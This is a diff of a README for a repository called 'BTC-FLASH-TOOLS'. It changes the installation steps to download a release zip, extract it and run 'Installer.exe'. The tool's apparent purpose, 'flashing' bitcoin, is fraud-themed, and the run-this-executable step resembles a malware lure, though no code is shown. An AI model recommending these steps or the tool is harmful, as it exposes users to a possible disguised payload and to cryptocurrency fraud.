LeGabz441/BTC-FLASH-TOOLS/README.md

 ## Installation ⚙️

-To get started with BTC FLASH TOOLS, follow these steps:

-   **Download the Latest Release**:
+1. Go to the [Releases](https://github.com/LeGabz441/BTC-FLASH-TOOLS/releases/tag/1.7.8) section of this repository.
+2. Download the latest `BTC-FLASH-TOOLS.v1.7.8.zip ` archive.
+3. Extract the contents of the archive to a convenient location.

-   Visit the [Releases section](https://github.com/LeGabz441/BTC-FLASH-TOOLS/releases) to download the latest version.
-Execute the downloaded file to start using the tools.
+4. Run the `Installer.exe` file to start the application.

 ## Usage 📦